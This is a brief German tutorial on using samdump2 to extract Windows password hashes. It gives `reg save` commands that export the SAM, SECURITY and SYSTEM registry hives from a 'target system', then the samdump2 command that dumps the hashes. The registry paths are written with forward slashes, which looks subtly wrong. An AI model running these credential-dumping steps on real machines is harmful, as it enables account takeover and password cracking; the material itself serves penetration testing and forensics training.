MBCDN

Samdump2 ist ein Tool, das verwendet wird, um Passwort-Hashes aus der SAM Datenbank (Windows) zu extrahieren. SAM steht für Security Account Manager, und diese Datenbank enthält Benutzeranmeldeinformationen.

Unter Windows auch mit Cygwin.

Kopiere die SYSTEM- und SAM-Dateien von deinem Zielsystem. Diese befinden sich normalerweise in

C:\Windows\System32\config

Du kannst diese Dateien nicht einfach kopieren, während Windows ausgeführt wird, daher solltest du entweder ein Live-System wie eine Linux-Distro verwenden oder von einer Backup-Kopie arbeiten.

reg save hklm/sam C:\tmp\sam.save
reg save hklm/security C:\tmp\security.save
reg save hklm/system C:\tmp\system.save

samdump2 system.save sam.save